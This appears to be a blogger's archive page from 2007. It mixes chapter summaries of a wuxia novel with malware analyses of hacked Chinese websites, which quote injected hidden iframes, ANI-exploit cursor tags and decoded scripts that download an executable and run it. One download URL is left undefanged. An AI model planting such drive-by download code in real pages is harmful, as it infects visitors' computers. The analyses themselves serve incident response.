大侠狄龙子 11回3 概要 endurer评注 兄妹识破父子阴谋 主仆跳江淑华获救

第十一回(3)
劫后喜逢君　共吐平生隐痛
舟中成敌国　惊回弱女余生

　　淑华命秋棠往唤常升不见，船夫说是玉堃命常升上岸寻医。
　　少女卖芍药报警（花蒂旁边有一片花叶后面写了“今夜有贼，全船皆是贼党，不可多问，无须惊惶，自有解救，看完将花弃去”等语），两个船家伸手调戏，对撞落水。
　　近黄昏时，卖花少女乘小船追来，丢来带纸条的银镖（纸条上写：“今夜不可吃酒。贼党如有无礼之处，不必惊惶，能忍则忍。真个不可开交，可将此镖取出，你恨何人，便向何人打去。贼党任多猖狂，一见此镖必不敢动，即便将他打伤，也是不妨，到了急难之时，自有人来抵挡，决可无事。”）
　　狗子要对淑华动手动脚，被玉堃唤去。
　　淑华装病留房，秋棠去取食物时被玉堃刀吓银买，说他父子已不再回家乡，小畜生看上淑华美貌，想人财两得。常升因看破阴谋被狗子暗命船家推入江心。要秋棠用下有蒙药和春药的酒把淑华灌醉，由狗子摆布。秋棠说若形势危急，自己便冷不防和狗子拼命，以报答淑华恩义。秋棠将玉堃所给的酒倒去，改喝自带的两瓶大曲。
　　狗子偷听被玉堃唤去。
　　淑华决计投水，袖藏利刀与秋棠走往前舱。
　　秋棠将狗子骗到船边，抱紧跳江。玉堃万金悬赏救子。
　　淑华悄到后艄，将要投江，被卖花少女救到崖顶。说他们兄妹途中救救了常升，得知玉堃父子阴谋，故装卖花来看淑华为人如何。其兄金钩小白龙已去救秋棠。要淑华守在此地。自己去杀贼，不论胜否都把淑华主仆用原船送走，兄妹再约人来一网打尽。

endurer评注

卖花少女兄妹不知是否为司徒怀方和司徒良珠，他们给秋棠的银镖不知为何物，有这大威摄力。

［人］卖花少女：一个青布包头的少女

［人］常升：夫家世仆，年己五十，从小便随主人出门，十分干练，人又忠心

[地]老王坝：当地山高水急，形势险恶，荒僻无人，却有着不少肥沃土地……当地山形险恶，下有伏礁，水流太急，容易翻船，山径甚是荒凉，并无人烟

［景］后见船驶江心，风帆饱满，天色已近黄昏；凭窗遥望，只见烟波浩荡，江流有声，一轮红日已与水面相接，浮沉跳荡于天水相涵之间，比起平时所见大了不知多少倍，红光万道，由遥天水面上对准船头直射过来，照得万顷江波闪动起亿万金鳞，大江落日，景极壮丽，不时更有三两渔舟容与中流，渔网半挑，划浆而过，两岸春山迤逦，暮霭苍茫，再经落波残阳回光反映，烟岚杂沓，红紫交辉，时有团团白云浮涌山间，滃然欲起，江面又阔，前后两面的轻帆宛如白鸥点点，出没波心，点缀得江山如画，美不胜收。

［人］玉堃：四个儿子，倒有三个短命……少年时又会拳棒……平日笑里藏刀，非到时机骤然发难，事前不肯现出丝毫形迹

［人］秋棠：十三四岁的少女

［人］金钩小白龙：卖花少女之兄。

旧雨楼·还珠楼主《大侠狄龙子》 全文

某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码

endurer 原创
2007-04-26 第1版

植入代码为：
/---
＜IFRAME src="hxxp://www.hao12**3**hao1**23.cn/ok/index.htm" frameBorder=0 width=0 height=0＞＜/IFRAME＞
---/

hxxp://www.hao12**3**hao1**23.cn/ok/index.htm 标题为：爱恋千雪，包含代码：
/---
＜iframe src="hxxp://www.qq5***13.cn/bbs/177***1.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://www.qq5***13.cn/bbs/177***1.htm 包含代码：
/---
＜iframe src="hxxp://www.5***55*y.net/" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://www.5***55*y.net/ 首页包含代码：
/---
＜iframe src=hxxp://www.97***72**5.com/97***725**16.htm?008 width=0 height=0＞＜/iframe＞
---/

hxxp://www.97***72**5.com/97***725**16.htm?008 包含代码：
/---
＜BODY style='CURSOR: url(hxxp://www.97***72**5.com/muxiao2.jpg)'＞＜/BODY＞
＜/HTML＞
＜script src=hxxp://www.97***72**5.com/0614.js＞＜/script＞
---/

hxxp://www.97***72**5.com/muxiao2.jpg（Kaspersky 报为：Exploit.Win32.IMG-ANI.k），下载 97725.exe。

文件说明符 : D:\test\97725.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-26 17:41:54
修改时间 : 2007-4-26 17:41:54
访问时间 : 2007-4-26 17:43:0
大小 : 16626 字节 16.242 KB
MD5 : a76acec51b3acc5d4da8dbaeb5257e80

UpackByDwing

Kasersky 报为 Worm.Win32.Delf.bs

hxxp://www.97***72**5.com/0614.js 的内容为 JavaScript脚本，功能为用自定义函数解密代码并通过 eval（）来运行。

解密后的代码再次用eval（）解密来运行。

再次解密后的JavaScript代码的功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe，保存到%windir%，文件名由自定义函数：

/---
function gn（n）｛var number ＝ Math.random（）＊n;
return ‘~tmp’+‘.tmp’；｝
---/

生成，即 ~tmp.tmp。然后通过 Shell.Application 对象 Q 的方法执行命令：%windir%\system32\cmd.exe /c %windir%\~tmp.tmp 来运行。

大侠狄龙子11回2概要 endurer评注 丈夫秘密日记揭阴谋 党兄玉堃父子存恶念

第十一回(2)
劫后喜逢君　共吐平生隐痛
舟中成敌国　惊回弱女余生

　　晏瑰说三姑得知文麟与淑华之事后，请人把淑华接来。强令文麟居中首坐，淑华、三姑女左右分坐，自己和文麟对坐。
　　三姑随说前事。
　　淑华除思念爱子良友外，岁月本极清闲。发现丈夫秘密日记，上记丈夫阴谋拆散淑华与文麟婚约，利用财势挟持两家父母，使文麟父子离家远游，买通下人将文磷三封寄往家中求亲之信吞没，强夺淑华。
　　文麟扶枢回籍，葬完父母，将田产分与兄弟，独身入蜀来投，对于丈夫父子更是忠心，遇事肯出死力，曾帮公公弥缝办错之事，事后病倒。丈夫见文麟痴爱淑华，此来只想常见颜色，使心上人夫荣妻贵，白头到老，遂结为骨肉之交，死前恐文麟避嫌离去，淑华母子支持不住，特意与沈煌写信说明经过，令劝乃母若改嫁应嫁文麟。
　　淑华觉不愿文麟负那恶名，断送前程，对文麟表面上比起以前还要冷淡，欲使误认自己凉薄无情，由爱生恨，负气离去，早日成家，去谋功名。
　　狄大娘无心发现日记遗书，看出真情，从旁劝解。
　　淑华远房兄长陈玉堃因闻淑华守着丈夫所留田产，满门孤弱，存有恶念，来说淑华之母老病缠绵，思念爱女，托陈玉堃因便道接淑华归宁。
　　淑华带男仆常升、使女秋棠起身。
　　船逆流上驶。男仆常升丢给淑华的小纸团被陈玉堃之子陈耀拾起丢入江中。
　　陈耀说常升泻肚病倒。
　　陈玉堃父子劝淑华改嫁，淑华正言回复，以死自誓。
　　船靠小镇岸，陈玉堃父子同船老上岸入酒楼……

endurer评注

孤儿寡母易受人欺。
陈玉堃父子不念戚情，动起邪念，更是可恶……

　　［人］晏瑰：一双红眼隐射金光，手和钢铁也似……性情豪爽……女中奇侠，不是看得起你，不会改口喊你文弟。她性情古怪，喜人说她菜美……性情孤高，只一投机，便以心腹相待

　　［人］陈玉堃：乃淑华远房兄长，已有多年不见……近年经商两湖，偶然也来四川办货……昔年在家颇有恶名……年纪已老，衣服华美，举止神情已大改变，不似昔年那样强横惹厌……老奸巨猾……拿着一串佛珠，时常默念

　　［人］陈耀：陈玉堃之子……年已成长，衣服也颇朴素，只是斜眼，面带诡笑，执礼甚恭。

　　［人］常升：淑华男仆

　　［人］秋棠：淑华使女

旧雨楼·还珠楼主《大侠狄龙子》 全文

一位网友的电脑中了Trojan.PSW.OnlineGames.amc

endurer 原创
2007-04-24 第1版

昨天，一位网友的电脑中了Trojan.PSW.OnlineGames.amc，虽然被瑞星查杀了，但他不太放心，让偶通过QQ远程协助帮忙检查。

一看，瑞星实时监控居然没有开，不过IE防漏洞补丁运行了……

检查瑞星的杀毒日志如下：
/---
病毒名称 处理结果 扫描方式 路径 文件 病毒来源
Trojan.MNless.jys 删除成功 定时扫描 C:\WINDOWS\system32\drivers ecdacgcf.sys 本机
Trojan.MNless.jys 删除成功 定时扫描 C:\Documents and Settings\new\Local Settings\Temp\4A cdnprot.sys 本机
Trojan.MNless.jys 删除成功 定时扫描 C:\Documents and Settings\new\Local Settings\Temp\4D cdnprot.sys 本机
Trojan.MNless.jys 删除成功 定时扫描 C:\Documents and Settings\new\Local Settings\Temp\63 cdnprot.sys 本机

Trojan.PSW.OnlineGames.amc 删除成功 手动扫描 C:\WINDOWS\system32 RAVFY48.DLL>>UPX 本机
Trojan.PSW.OnlineGames.amc 删除成功 手动扫描 C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\5OPE3GZX 2[1].exe>>fsg2.0 本机
Trojan.PSW.OnlineGames.amc 删除成功 手动扫描 C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\5OPE3GZX 2[2].exe>>fsg2.0 本机
Trojan.PSW.OnlineGames.amc 删除成功 手动扫描 C:\Program Files\Internet Explorer iedw02.exe>>fsg2.0 本机
---/
估计是浏览网页时中标，不过被IE防漏洞补丁给阻止了，没有跑起来。

下载 pe_xscan 扫描log分析，发现如下可疑项：
/---
pe_xscan 07-03-17 by Purple Endurer
2007-4-23 17:42:47
Windows XP Service Pack 2(5.1.2600)
管理员用户组
[System Process] * 0
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54
C:\PROGRA~1\3721\helper.dll 2006-12-27 10:29:52
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32
C:\WINDOWS\Explorer.EXE * 1096 2004-8-8 4:0:0
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54
C:\PROGRA~1\3721\helper.dll 2006-12-27 10:29:52
C:\PROGRA~1\3721\alrex.dll 2006-12-21 17:53:48
C:\PROGRA~1\3721\autolive.dll 2007-4-9 10:58:44
C:\PROGRA~1\3721\alLiveEx.dll 2006-3-21 14:20:6
C:\PROGRA~1\3721\ske\contmenu.dll 2005-2-23 17:59:6

C:\Program Files\CNNIC\Cdn\cdnup.exe * 1152 2007-4-21 19:1:10
C:\Program Files\CNNIC\Cdn\cdnup.exe 2007-4-21 19:1:10
C:\Program Files\CNNIC\Cdn\cdnuplib.dll 2007-4-21 19:2:48
C:\Program Files\CNNIC\Cdn\cdnprh.dll 2007-4-21 19:2:0
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54

C:\Program Files\Rising\AntiSpyware\runiep.exe * 1280 2007-4-23 10:10:34
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32

C:\WINDOWS\system32\rundll32.exe * 1336 2004-8-8 4:0:0
C:\PROGRA~1\3721\helper.dll 2006-12-27 10:29:52
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32
C:\PROGRA~1\3721\autolive.dll 2007-4-9 10:58:44
C:\PROGRA~1\3721\notifier.dll 2006-12-21 17:53:50
C:\PROGRA~1\3721\alLiveEx.dll 2006-3-21 14:20:6

C:\WINDOWS\system32\ctfmon.exe * 2324 2004-8-8 4:0:0
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54
C:\PROGRA~1\3721\helper.dll 2006-12-27 10:29:52
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32

D:\软件\QQ\TIMPlatform.exe * 2460 2007-2-2 16:41:0
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54
C:\PROGRA~1\3721\helper.dll 2006-12-27 10:29:52
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32
D:\软件\QQ\QQ.exe * 156 2007-2-2 19:0:12
C:\PROGRA~1\3721\CnsM.dll 2007-4-17 11:25:54
C:\PROGRA~1\3721\helper.dll 2006-12-27 10:29:52
C:\Program Files\CNNIC\Cdn\imaoe.dll 2007-4-21 19:1:38
C:\Program Files\CNNIC\Cdn\cdnforie.dll 2007-4-21 19:2:38
C:\Program Files\CNNIC\Cdn\cdndet.dll 2007-4-21 19:1:32

O2 - BHO CdnForIE Class - {5C3853CF-C7E0-4946-B3FA-1ABDB6F48108} - C:\PROGRA~1\CNNIC\Cdn\cdnforie.dll

O2 - BHO - {669751ED-D558-49AE-B01A-3B374CC7910E} - C:\WINDOWS\system32\ssup.dll

O4 - HKLM\..\Run: [CdnCtr] C:\Program Files\CNNIC\Cdn\cdnup.exe

O4 - HKLM\..\Run: [CnsM.dll] Rundll32.exe C:\PROGRA~1\3721\CnsM.dll,Rundll32

O4 - HKLM\..\Run: [helper.dll] C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\3721\helper.dll,Rundll32

O21 - SSODL - rdshost(4) - {CD5BAE98-08ED-4D9C-8D7E-B3B4F958E61C} = rdshost.dll

O23 - 服务: ADProt (ADProt) - C:\WINDOWS\system32\drivers\ADProt.sys 2007-4-21 18:52:48(系统)

O23 - 服务: cdnprot (cdnprot) - system32\drivers\cdnprot.sys(引导)

O23 - 服务: phbpcre (phbpcre) - system32\drivers\phbpcre.sys(禁用)

O23 - 服务: pjjgkej (pjjgkej) - C:\WINDOWS\System32\drivers\pjjgkej.sys 2007-4-23 10:15:4(引导)
---/

其中 O21 好像是某MSN蠕虫用的东东的残留项目，其它的主要是流氓软件和广告软件了

用HijackThis、卡卡安全助手和Dr.Web CureIt查杀修复。

大侠狄龙子 11回1 概要 endurer评注 文麟把手温存忆旧 淑华正劝反激娶妻

第十一回(1)
劫后喜逢君　共吐平生隐痛
舟中成敌国　惊回弱女余生

　　文麟进西边黑衣女侠晏瑰一家，见淑华带病和衣而卧。
　　文麟把手温存忆旧。
　　淑华正劝反激文麟娶妻无功。
　　晏瑰请淑华、文麟就餐，三姑在座。

endurer评注

不知黑衣女侠晏瑰是何来历

情人眼里出西施
/---
意中人一双黑白分明的秀目正注视着自己，虽然带着几分病容，但那明眸皓齿微笑嫣然，容光依然美艳，尤其颦笑之间隐蕴着无限柔情，和以前偶然相见判若两人，由不得心头怦怦跳动，忙走过去，面对床头，侧身坐下，心情甚乱，也想不出说什话好。
---/

人生如梦
/---
淑华……佯嗔道：“……人生本是幻梦，这等认真作什？”
---/

[宅]：茅篷甚是高大，外层空无一物，木桩梁柱以外，只有两块兀立地上的山石，通体光滑，不知何用？门内是一大天井，三面均有房舍，但不相连，都是四五间做一幢，立在平地之上；东边一所房门紧闭，正面倚山而建，门窗洞启……往西边一家走去。
　　到了门前，隔窗一看，那屋共是一排四间，两明两暗，明间里面还有一层，门帘下垂，微有一线灯光外映

［人］黑衣女侠晏瑰：一个身着黑衣、身材枯瘦、双目通红、相貌十分鬼怪、其形如猴的中年妇女，面黑如墨，嘻着一口白牙，目光闪闪……江南口音……自来厌恶男子假作多情……以前往来江湖，遇见这类负心昧良的人，从不容他活命。

［人］淑华：性情外和内刚……人最端庄……天性喜洁，爱好天然……比文麟大三岁。

旧雨楼·还珠楼主《大侠狄龙子》 全文

某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码

endurer 原创
2007-04-22 第1版

加入的代码为：
/---
＜iframe src='hxxp://s**72.91**152**0.net/site/g****g/1**.htm' height=0 width=50＞＜/iframe＞
---/

hxxp://s**72.91**152**0.net/site/g****g/1**.htm 包含为：
/---
＜DIV
style="CURSOR: url('love.jpg')"＞＜/DIV＞＜/DIV＞＜/BODY＞＜/HTML＞
＜iframe src=hxxp://s**72.91**152**0.net/site/g****g/1**4.htm name="main1" height="0" width="100" ＞＜/iframe＞
---/
love.jpg（Kaspersky报为Exploit.Win32.IMG-ANI.k）下载 http://mail.8u8y.com/ad/pic/1.exe

文件说明符 : D:\test\1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-20 12:39:24
修改时间 : 2007-4-20 12:40:32
访问时间 : 2007-4-20 12:40:42
大小 : 21479 字节 20.999 KB
MD5 : 946bc00b1bcc782fade890c049e8e112

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bga ，瑞星报为 Trojan.Mnless.kip

hxxp://s**72.91**152**0.net/site/g****g/1**4.htm的内容为JavaScript脚本代码，功能为用自定义函数：

/---
var Z＝function（m）｛return String.fromCharCode（m^79）｝；
---/

解密代码并通过 eval() 来运行。

解密后的 内容仍为JavaScript脚本代码，功能为
是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://mail.8***u**8y.com/ad/pic***/temp.exe，保存到%windir%，文件名由自定义函数：

/---
function gn（n）｛var number ＝ Math.random（）＊n;
return ＇～tmp＇＋Math.round（number）＋＇.exe＇；｝
---/

生成，即 ~tmp****.exe，其中****为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。
temp.exe与前面的1.exe相同。

某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码

endurer 原创
2007-04-19 第1版

植入的代码为：
/---
＜iframe src=hxxp://www.y*xg**m7****8.com/y*x.htm width=0 height=0＞＜/iframe＞
---/

hxxp://www.y*xg**m7****8.com/y*x.htm 包含代码：
/---
＜iframe src="hxxp://l****l*8**0.com/x**x/x**x.htm" width=1 height=1＞＜/iframe＞
---/

hxxp://l****l*8**0.com/x**x/x**x.htm　包含代码：
/---
＜iframe src="hxxp://l****l*8**0.com/x**x/x**x**1.htm" width=100 height=1＞＜/iframe＞
＜iframe src="hxxp://l****l*8**0.com/x**x/x**x**2.htm" width=100 height=1＞＜/iframe＞
---/

hxxp://l****l*8**0.com/x**x/x**x**1.htm 包含代码：
/---
＜DIV style="CURSOR: url('hxxp://l****l*8**0.com/x**x/xx2.jpg')"＞

利用ANI漏洞 通过 xx2.jpg 下载文件 xx.exe。

hxxp://l****l*8**0.com/x**x/x**x**2.htm 的内容为分为两部分。
第一部分为VBScript代码，功能是 利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xx.exe，保存为c:\xiaogang.exe。然后创建内容为
/---
Set Shell ＝ CreateObject（"Wscript.Shell"）
Shell.Run （"c:\xiaogang.exe"）
Set Shell ＝ Nothing
---/
的文件xiaogang.vbs。
通过Shell.Application 对象 Zhong 的 ShellExecute 方法 执行xiaogang.vbs，从而运行xiaogang.exe。

第二部分是jscript代码：是输出迷惑信息：
/---
你好，您所访问的页面正在加载中...请稍候片刻....
---/

文件说明符 : d:\test\xx.exe
属性 : A---
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-4-19 22:49:7
修改时间 : 2007-4-19 22:49:8
访问时间 : 2007-4-19 0:0:0
大小 : 17436 字节 17.28 KB
MD5 : 86ac4df3630f76bbfb5265746d52eca3

Scanned file: xx.exe - Infected

xx.exe - infected by Backdoor.Win32.Agent.ahj

Statistics:

Known viruses:	299444	Updated:	19-04-2007
File size (Kb):	18	Virus bodies:	1
Files:	1	Warnings:	0
Archives:	0	Suspicious:	0

大侠狄龙子10回概要 endurer评注 僧道毙命沙镇方智退黑骷髅 冯蔡绝交三姑伴送周文麟

第十回
劈掌戮群凶　桃弯惊芒　谋人自毙
痴情深一往　溪山如画　与子同行

　　恶道也想突袭文麟，为避三姑之掌，被窗外千斤大力神掌打得肝肠断裂，七窍流血，死于就地。
　　三姑想拉文麟越窗而出，冯婉如等发声阻止。
　　中条黑七煞（七友）中第一能手神行无影黑骷髅查牧和矮韦护、铁掌铜拳沙镇方先后现身。
　　黑骷髅发现凶僧用暗器五毒核桃钉偷袭自己七窍和身上要穴，将计就计，接一枚，吹向梁上一枚，避开内中三枚去打贼党，多半击退回去，凶僧口内中标，死于非命。
　　冯胜呆在当地，做声不得。
　　沙镇方和三姑之父同盟至交，借着凶僧妄用黑门暗器和蔡三姑与来人相识为由，想要化解此事，并将事情揽在他的身上，表面情愿向敌人服低，实则是想保全自己威名身家，和来人一同跳出圈外，不问这场争斗之事，一面去掉几个强敌，并还把雷四先生这一关一同交代过去。
　　三姑说自己遇人不淑被弃，看中文麟被拒，结为姐弟。八公误信长舌妇拨弄是非，以为对他诽谤，将文麟绑来。不到万不得已、生死关头，不提以前之事，与冯家从此两不相犯。要用七煞中丁三老侠所赠银符请黑骷髅调解。
　　黑骷髅说起中条山群英盛会之事，让三姑后日午前将银符送往金顶。
　　三姑取回铁木令，同文麟越窗而出，发现恶兽黄猩子飞来。黑骷髅右手挟着文麟往下飞落，左手凌空一挥，击倒黄猩子。
　　三姑送文麟到盘蛇谷附近的女主人姓晏的茅篷……

endurer评注

仅从“身材瘦小”就推断“头戴面具身穿紧身黑皮衣裤的”黑骷髅查牧是少年，并不稳妥。

［武］千斤大力神掌

［人］神行无影黑骷髅查牧：头戴面具身穿紧身黑皮衣裤的少年，因是身材瘦小，所穿紧身短衣似皮非皮，不知何物所制，紧贴身上，更显得皮包骨头，又瘦又小，通体纯黑，所戴面具又是人皮所制，色作灰白，青渗渗的，看去和骷髅一样，身手矫捷，动作如飞……近年本不愿多事……生平最恨恃强欺人的狗贼……昔年与雷四先生齐名……炼就玄门罡气，扬手便可制他死命……当年中条黑七煞中第一能手，天生异禀，炼就玄门罡气，耳目尤为灵警，能在隔墙百步之外打人要穴，著名的嫉恶如仇，手狠心黑，凶僧对他暗算，分明自寻死路，尤其所穿黑衣乃蛟皮所制，刀剑不入……所穿黑皮紧身衣裤看去松紧如意，黑中透亮，隐有鳞甲之纹，柔软异常，头上黑皮套和上衣相连，双手双足也是同样皮套皮衣皮鞋，除一片灰白色的人皮面具紧绷脸上，露出那一双黄光四射的怪眼而外，从头到脚均是纯黑，不见一点皮肤，周身装束好似天然生成一样……疾恶如仇，丝毫不肯容让

［物］雷四铁木令：所到之处，照例不容违抗，顺他者生，逆他者死

［人］矮韦护、铁掌铜拳沙镇方：冯八公昔年至交……一个须发如银、根根见肉的红脸矮胖子，手中拿着两个茶杯大小的铜球……生平从不以多为胜。……年已八十……原和三姑之父同盟至交，三姑幼时也曾见过，只为隐居福建莆田，相隔大远，等到听说蔡父已死，事情已隔了好几年，退隐年久不愿远出……为人又是外和内刚，机智绝伦……由十余岁出道，纵横江湖数十年，现在年已八旬，从来不曾失过一次风，除练就极好武功、有名的铁掌铜拳外，因其足智多谋，机警绝伦，一班老朋友都叫他双料张良

［暗］五毒核桃钉：偷偷取出，握在手内，运用真力，用内家真气，侧目偷觑，见敌人趾高气扬，朝着沙老和婉如等贼党从容发话，旁若无人，越发有气，冷不防把手一扬，照准对方上下穴道，似一蓬寒星打去。……乃凶僧独门暗器，形如核桃，长约寸半，前头凸出一钉，约有寸许长短，另外还有五个棱角，纯钢打就，锋利无比，并有毒药喂过，中人必死，无论多坚厚之物，中上必碎。……棱角锋利，无论皮革衣服均易划破

［人］凶僧：仗着一身武功，生具神力，以前所背铁木鱼，重有上百斤，拿在手上运转如风，周身炼得和铁一样，刀斧所不能伤，纵横江湖多年。极少遇见对手，生平共总两次败在异人手内，余者所遇全非其敌，这类暗器直用不着，又因棱角锋利，无论皮革衣服均易划破，已有多年不曾携带。……这类四面均有尖角、锋利非常、触手即碎又具奇毒的暗器，寻常武家连一枚也无法把握，他却大把拿在乎内，全是锋尖朝前，互相凑合，并在一起，合成一根三四寸长两三寸方圆形如铁钉之物，同时发将出去，出手分散，化为十余点寒星，并还照准敌人上下穴道，似暴雨一般打去，端的又猛又急，凶毒无比。……僧道两人武功高强，硬功更有根底，天生神力，刀斧不伤

［人］三姑：内外功均臻绝顶，更有一口削铁如泥专破武功的宝刀和三只神铁镖

［人］冯婉如：五妹。平日阴险淫凶，助纣为虐，最喜长舌，拨弄是非……最是阴毒

［人］丁三老侠：中条七友之一……坐化以前，曾说他七十三面银符现均收回

［人］中条七友：只剩四个

［人］小白旗金弓银弹子蔡天章：三姑之父……昔年全家归隐便是听丁三老侠劝，家中还存有他老人家一面银符。

［会］中条山群英会：在座三十七位英侠为了不久都要退隐，曾将各人信符取出，传观以后，见符如见人，所到之处全有照应，如其有人故意为难，得到信符的人不妨就近寻访在场诸位英侠随时求助，只要情理上讲得过去，或受强仇大敌欺凌侵害，无求不允。……一班老友曾经约定，无论何人，只一发现各人令符，便须追究来源，出力相助，不容坐视

［兽］恶黄猩子：生具神力，身轻如燕，两条长臂坚逾铜铁

［地］盘蛇谷：后山盘蛇谷，为山中最隐僻之区，四围均有深沟高崖阻隔，休说香客游人，连久居前山的和尚和樵采人也极少有人来过。但这一带气候温暖，风景清丽，尤其春来到处繁花，一片青碧，加上许多清溪映带，越发引人入胜，自来便是高人奇士隐居之地。

［人］晏：前面乃是一片峭壁危崖，崖腰上面现出一片平地和数百竿竹林，林中果有一座茅篷隐现……这家女主人姓晏，是我（三姑）新交至好，无须客气。她那房舍便在对面竹林之中，外观是一茅篷，内里却有两层房舍，共住两家，东边屋内住一异人，脾气古怪，无人引进，经其允许，不可入内。进门可往西边房中走进，主人如在，自会接待，否则照直入内，无须客气。

旧雨楼·还珠楼主《大侠狄龙子》 全文

04-17/网友的电脑成灰鸽子窝了/V2

endurer 原创
2007-04-17 第2版 补充pe_xscan的log分析，Dr.Web CureIt的扫描结果，部本病毒样本信息
2007-04-16 第1版

刚才一位网友反应说他的电脑最近工作速度很慢，让偶通过QQ远程协助帮助检查。

打开任务管理器，发现有名为 Down(0).exe 和 iexplore.exe 的进程，而当时并没有运行IE。估计是中标了。

下载 pe_xscan 和 HijackThis扫描log。

在 pe_xscan 的 log 中发现如下可疑项目：
/===
pe_xscan 07-03-25 by Purple Endurer
2007-4-16 21:59:33
Windows XP Service Pack 2(5.1.2600)
管理员用户组
[System Process] * 0
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\WINDOWS\system32\Down(0).exe * 1484 1980-4-2 7:1:30
C:\WINDOWS\system32\Down(0).exe 1980-4-2 7:1:30
C:\WINDOWS\Explorer.EXE * 1644 2004-8-17 12:0:0 Microsoft(R) Windows(R) OperatingSystem 6.00.2900.2180 Windows Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? explorer EXPLORER.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\Program Files\Internet Explorer\IEXPLORE.EXE * 1720 2004-8-17 20:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Internet Explorer (C)Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\Program Files\Internet Explorer\IEXPLORE.EXE * 1784 2004-8-17 20:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Internet Explorer (C)Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26C:\program files\internet explorer\iexplore.exe * 1804 2004-8-17 20:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Internet Explorer (C)Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\WINDOWS\system32\ok6250522.3322.org.dll 2007-4-15 14:21:32 Microsoft?Windows? Operating System 5.1.2600.2180 Microsoft? Windows? Operating System MicrosoftCorporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) MicrosoftCorporation VipDll msgsvc4.dll
C:\WINDOWS\system32\khooker.exe * 236 2002-9-24 1:50:48 SIS (R) Compatible SuperVGA keyboard daemon for Windows 2000/XP 0.0.0.2098 SiS Compatible Super VGA KeyboardDaemon Copyright (C) Silicon Integrated Systems Corp. 1998-2002 0.0.0.2098 SiliconIntegrated Systems Corporation KHOOKER 2.09j.03 KHOOKER.EXE
C:\WINDOWS\SYSTEM32\WINNETWORKKEY.DLL 1980-4-2 7:1:26
C:\Program Files\Common Files\Real\Update_OB\realsched.exe * 320 2007-2-1415:9:14 RealPlayer (32-bit) 0.1.0.3760 RealNetworks Scheduler Copyright ?RealNetworks, Inc. 1995-2004 0.1.0.3760 RealNetworks, Inc. RealAudio(tm) is atrademark of RealNetworks, Inc. schedapp realsched.exe
